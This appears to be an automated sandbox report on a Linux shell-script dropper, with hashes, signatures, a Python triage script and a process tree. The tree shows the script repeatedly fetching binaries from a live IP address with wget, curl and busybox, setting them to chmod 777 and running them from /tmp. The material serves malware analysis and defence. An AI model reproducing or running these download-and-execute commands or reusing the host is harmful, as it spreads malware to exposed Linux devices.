Analysis
-
max time kernel
19s -
max time network
21s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system -
submitted
24/11/2024, 01:01
Static task
static1
Behavioral task
behavioral1
Sample
79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd.sh
-
Size
10KB
-
MD5
112415f7f803f0bc4c888b82f2c037a3
-
SHA1
7b1124181c17eebde60fab13d9a272f93f4e2943
-
SHA256
79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd
-
SHA512
293e8e27189dd5875d8d5e14dfa1d1a13f03240d95b9fc142f94f0576efb4b6ce8d2be8b05b334a96280ad14f2c295f64c284e25f4f9fe2e1f15f1ce8a4e0e49
-
SSDEEP
192:mig3ol2lqlXwgCSec72qbuCtCVCldOY476GG7Fthy+fv7zeS8aMUF7G6S7q2dV9u:Ec5IQlcY4WqC+sIQlcYpb
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses. In this run every hit is a chmod 777 on a freshly downloaded payload, making it world-readable, world-writable and executable immediately before the script runs it.
PID   Process
829   chmod
745   chmod
791   chmod
797   chmod
803   chmod
809   chmod
815   chmod
821   chmod
835   chmod
755   chmod
Executes dropped EXE 10 IoCs
IoC                                        PID   Process
/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy    746   wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy
/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4    757   F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4
/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat    792   BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat
/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c    798   vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c
/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E    804   93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E
/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y    810   iQArRmyWEu9TrycExH8PaE1szm3DaBah0y
/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT    816   Lo46YywIia327erXTugKxcchWtLwMJPGmT
/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0    822   TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0
/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB    830   KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB
/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR    836   05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicates whether the system is a virtual machine. Every hit below is raised by curl, the sandbox image's own download tool, not by the sample or by any dropped payload, so it is consistent with library CPU-feature probing at curl start-up on the armhf image and should not be counted as sandbox evasion by the sample.
Description               IoC             Process
File opened for reading   /proc/cpuinfo   curl   (10 hits, one per curl invocation)
Reads runtime system information 20 IoCs
Same caveat: all hits come from curl (FIPS-mode and auxiliary-vector reads at start-up), not from the sample.
Description               IoC                             Process
File opened for reading   /proc/self/auxv                 curl   (10 hits)
File opened for reading   /proc/sys/crypto/fips_enabled   curl   (10 hits)
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory. Here the writer is curl (the -O download); each file is then made executable and run from /tmp, so a noexec mount on /tmp would block the execution stage of this loop (execve fails with EPERM), which is the check worth making on exposed Linux and embedded hosts.
Description                    IoC                                       Process
File opened for modification   /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c   curl
File opened for modification   /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y   curl
File opened for modification   /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy   curl
File opened for modification   /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4   curl
File opened for modification   /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat   curl
File opened for modification   /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB   curl
File opened for modification   /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR   curl
File opened for modification   /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E   curl
File opened for modification   /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT   curl
File opened for modification   /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0   curl
Processes
-
Process tree as recorded (image, then command line, then PID). The sample script is the root; every command below it is a direct child at depth 2. For each payload the script tries wget, curl -O and busybox wget in turn (so it works on minimal images that have only one of them), then chmod 777, executes the file from /tmp and removes it.
/tmp/79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd.sh  /tmp/79f20583b58c6b9361207b61318f5f466277af01483d5de677840df7c29137dd.sh  [PID 671]
  /bin/rm  /bin/rm bins.sh  [PID 673]
  /usr/bin/wget  wget http://87.120.125.191/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy  [PID 676]
  /usr/bin/curl  curl -O http://87.120.125.191/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy  [PID 719]
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy  [PID 741]
  /bin/chmod  chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy  [PID 745]
    - File and Directory Permissions Modification
  /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy  ./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy  [PID 746]
    - Executes dropped EXE
  /bin/rm  rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy  [PID 748]
  /usr/bin/wget  wget http://87.120.125.191/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4  [PID 750]
  /usr/bin/curl  curl -O http://87.120.125.191/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4  [PID 752]
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4  [PID 754]
  /bin/chmod  chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4  [PID 755]
    - File and Directory Permissions Modification
  /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4  ./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4  [PID 757]
    - Executes dropped EXE
  /bin/rm  rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4  [PID 759]
  /usr/bin/wget  wget http://87.120.125.191/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat  [PID 760]
  /usr/bin/curl  curl -O http://87.120.125.191/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat  [PID 778]
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat  [PID 788]
  /bin/chmod  chmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat  [PID 791]
    - File and Directory Permissions Modification
  /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat  ./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat  [PID 792]
    - Executes dropped EXE
  /bin/rm  rm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat  [PID 793]
  /usr/bin/wget  wget http://87.120.125.191/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c  [PID 794]
  /usr/bin/curl  curl -O http://87.120.125.191/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c  [PID 795]
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c  [PID 796]
  /bin/chmod  chmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c  [PID 797]
    - File and Directory Permissions Modification
  /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c  ./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c  [PID 798]
    - Executes dropped EXE
  /bin/rm  rm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c  [PID 799]
  /usr/bin/wget  wget http://87.120.125.191/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E  [PID 800]
  /usr/bin/curl  curl -O http://87.120.125.191/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E  [PID 801]
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E  [PID 802]
  /bin/chmod  chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E  [PID 803]
    - File and Directory Permissions Modification
  /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E  ./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E  [PID 804]
    - Executes dropped EXE
  /bin/rm  rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E  [PID 805]
  /usr/bin/wget  wget http://87.120.125.191/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y  [PID 806]
  /usr/bin/curl  curl -O http://87.120.125.191/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y  [PID 807]
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y  [PID 808]
  /bin/chmod  chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y  [PID 809]
    - File and Directory Permissions Modification
  /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y  ./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y  [PID 810]
    - Executes dropped EXE
  /bin/rm  rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y  [PID 811]
  /usr/bin/wget  wget http://87.120.125.191/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT  [PID 812]
  /usr/bin/curl  curl -O http://87.120.125.191/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT  [PID 813]
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT  [PID 814]
  /bin/chmod  chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT  [PID 815]
    - File and Directory Permissions Modification
  /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT  ./Lo46YywIia327erXTugKxcchWtLwMJPGmT  [PID 816]
    - Executes dropped EXE
  /bin/rm  rm Lo46YywIia327erXTugKxcchWtLwMJPGmT  [PID 817]
  /usr/bin/wget  wget http://87.120.125.191/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0  [PID 818]
  /usr/bin/curl  curl -O http://87.120.125.191/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0  [PID 819]
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0  [PID 820]
  /bin/chmod  chmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0  [PID 821]
    - File and Directory Permissions Modification
  /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0  ./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0  [PID 822]
    - Executes dropped EXE
  /bin/rm  rm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0  [PID 823]
  /usr/bin/wget  wget http://87.120.125.191/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB  [PID 824]
  /usr/bin/curl  curl -O http://87.120.125.191/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB  [PID 825]
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB  [PID 826]
  /bin/chmod  chmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB  [PID 829]
    - File and Directory Permissions Modification
  /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB  ./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB  [PID 830]
    - Executes dropped EXE
  /bin/rm  rm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB  [PID 831]
  /usr/bin/wget  wget http://87.120.125.191/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR  [PID 832]
  /usr/bin/curl  curl -O http://87.120.125.191/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR  [PID 833]
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR  [PID 834]
  /bin/chmod  chmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR  [PID 835]
    - File and Directory Permissions Modification
  /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR  ./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR  [PID 836]
    - Executes dropped EXE
  /bin/rm  rm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR  [PID 837]
  /usr/bin/wget  wget http://87.120.125.191/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5  [PID 838]
The wget for jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 is the last event captured; the curl, busybox, chmod, execute and rm stages for that eleventh payload do not appear in the trace.
-
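The loop in the process tree and the signature attribution question from the Signatures section are easiest to reason about as a small piece of triage logic. The following Python is an added example written for this page, not output of the sandbox and not code from the sample: it replays a constructed subset of the events above (PIDs, images, command lines and the C2 URLs transcribed from the tree; the tuple layout is an assumption), flags every payload that completed the fetch, chmod 777, execute and rm stages, extracts the resulting IOCs, and separates signature hits raised by the sandbox image's own curl and chmod from hits raised by files under /tmp. The signature rows are likewise transcribed from the report with the process column resolved to the image path shown in the tree.

```python
"""Added triage example for this report (not the sandbox's own output).

Replays a constructed subset of the report's process events, detects the
per-payload fetch -> chmod 777 -> execute -> rm loop, extracts IOCs, and
separates signature hits raised by the sandbox image's own tools from hits
raised by dropped payloads.  Event/hit layouts are assumptions for this example.
"""
import re
from urllib.parse import urlparse

# (pid, image, cmdline): transcribed from the report's process tree (two of the
# ten payload rounds plus the trailing wget); all are children of the script, PID 671.
EVENTS = [
    (673, "/bin/rm", "/bin/rm bins.sh"),
    (676, "/usr/bin/wget", "wget http://87.120.125.191/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy"),
    (719, "/usr/bin/curl", "curl -O http://87.120.125.191/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy"),
    (741, "/bin/busybox", "/bin/busybox wget http://87.120.125.191/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy"),
    (745, "/bin/chmod", "chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy"),
    (746, "/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy", "./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy"),
    (748, "/bin/rm", "rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy"),
    (750, "/usr/bin/wget", "wget http://87.120.125.191/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4"),
    (752, "/usr/bin/curl", "curl -O http://87.120.125.191/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4"),
    (754, "/bin/busybox", "/bin/busybox wget http://87.120.125.191/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4"),
    (755, "/bin/chmod", "chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4"),
    (757, "/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4", "./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4"),
    (759, "/bin/rm", "rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4"),
    # Last payload in the trace: only the wget was captured.
    (838, "/usr/bin/wget", "wget http://87.120.125.191/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5"),
]

URL_RE = re.compile(r"https?://\S+")
FETCHERS = {"wget", "curl", "busybox"}  # the three download tools the script tries in turn


def find_drop_and_run_chains(events):
    """Group events by payload name and record which loop stages each one reached."""
    chains = {}
    for pid, image, cmdline in events:
        tool = image.rsplit("/", 1)[-1]
        argv = cmdline.split()
        if tool in FETCHERS:
            match = URL_RE.search(cmdline)
            if match is None:
                continue
            url = match.group(0)
            name = urlparse(url).path.rsplit("/", 1)[-1]
            chain = chains.setdefault(
                name, {"url": url, "fetchers": [], "chmod": None, "exec": None, "rm": None})
            chain["fetchers"].append(tool)
        elif tool == "chmod" and len(argv) >= 3 and argv[-1] in chains:
            chains[argv[-1]]["chmod"] = (pid, argv[1])  # (pid, mode)
        elif tool == "rm" and len(argv) >= 2 and argv[-1] in chains:
            chains[argv[-1]]["rm"] = pid
        elif image.startswith("/tmp/") and argv[:1] == ["./" + tool] and tool in chains:
            chains[tool]["exec"] = pid  # a downloaded file was executed from /tmp
    return chains


def complete_chains(chains):
    """Payloads that were fetched, chmod 777'd, executed and then deleted."""
    return sorted(name for name, c in chains.items()
                  if c["fetchers"] and c["chmod"] and c["chmod"][1] == "777"
                  and c["exec"] is not None and c["rm"] is not None)


def iocs(chains):
    """Network and host IOCs exposed by the loop (hosts, URLs, executed drop paths)."""
    return {
        "hosts": sorted({urlparse(c["url"]).netloc for c in chains.values()}),
        "urls": sorted(c["url"] for c in chains.values()),
        "dropped_paths": sorted("/tmp/" + n for n, c in chains.items() if c["exec"] is not None),
    }


# (signature, process image): one row per signature in the report, process column
# resolved to the image path shown in the process tree.
SIGNATURE_HITS = [
    ("Checks CPU configuration", "/usr/bin/curl"),
    ("Reads runtime system information", "/usr/bin/curl"),
    ("Writes file to tmp directory", "/usr/bin/curl"),
    ("File and Directory Permissions Modification", "/bin/chmod"),
    ("Executes dropped EXE", "/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy"),
]


def attribute_hits(hits, chains):
    """Split hits by who raised them: a VM-check signature raised by the image's own
    curl says nothing about the sample; the same hit from a file under /tmp would."""
    dropped = {"/tmp/" + name for name in chains}
    out = {"payload": [], "image_tool": []}
    for sig, image in hits:
        out["payload" if image in dropped else "image_tool"].append(sig)
    return out


if __name__ == "__main__":
    chains = find_drop_and_run_chains(EVENTS)
    for name in complete_chains(chains):
        c = chains[name]
        print(f"{name}: fetched via {'/'.join(c['fetchers'])}, chmod {c['chmod'][1]} "
              f"(pid {c['chmod'][0]}), exec pid {c['exec']}, rm pid {c['rm']}")
    print("fetch only:", sorted(set(chains) - set(complete_chains(chains))))
    print(iocs(chains))
    print(attribute_hits(SIGNATURE_HITS, chains))
```

Run over the full tree the same logic yields ten complete chains and one fetch-only entry; the split produced by attribute_hits is the reason the CPU and /proc reads in the Signatures section should be reported as image-tool noise rather than as evasion by the sample.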
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
-
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97